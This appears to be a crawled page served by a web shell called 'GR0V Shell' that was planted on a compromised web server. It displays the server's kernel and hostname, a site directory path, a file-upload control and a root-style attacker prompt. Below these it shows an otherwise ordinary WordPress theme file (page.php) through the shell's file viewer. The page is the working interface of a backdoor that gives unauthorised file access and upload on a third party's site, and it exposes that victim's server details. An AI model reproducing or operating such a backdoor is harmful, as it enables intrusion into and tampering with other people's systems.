? GR0V Shell

GR0V shell

Linux www.koreapackagetour.com 2.6.32-042stab145.3 #1 SMP Thu Jun 11 14:05:04 MSK 2020 x86_64

Path : /home/admin/domains/happytokorea.com/public_html_bk/wordpress/
File Upload :
Current File : /home/admin/domains/happytokorea.com/public_html_bk/wordpress/page.php

<?php get_header(); ?>

<div id="sub-column">

        <div id="sub-top">
                <?php get_template_part('scripts/breadcrumb'); ?>
        </div>

        <div id="sub-content">
                
                <div class="content">
                        <?php if (have_posts()) : ?>
                        <?php while (have_posts()) : the_post(); ?>
                        
                        <div class="post">
                                <?php the_content();?>
                                
                        </div>
                        
                        <div class="wp-pagenavi"><?php wp_link_pages('before=Pages: &pagelink=<span>%</span>'); ?></div>
                        
                        <?php endwhile; endif;?>

                        <?php
                        
                        if($post->comment_status == "open") {
                        
                                comments_template();
                        
                        } ?>
                        
                        <?php edit_post_link('Edit Post'); ?>
                </div>

<?php get_sidebar(); ?>

<?php get_footer(); ?>

T1KUS90T
  root-grov@210.1.60.28:~$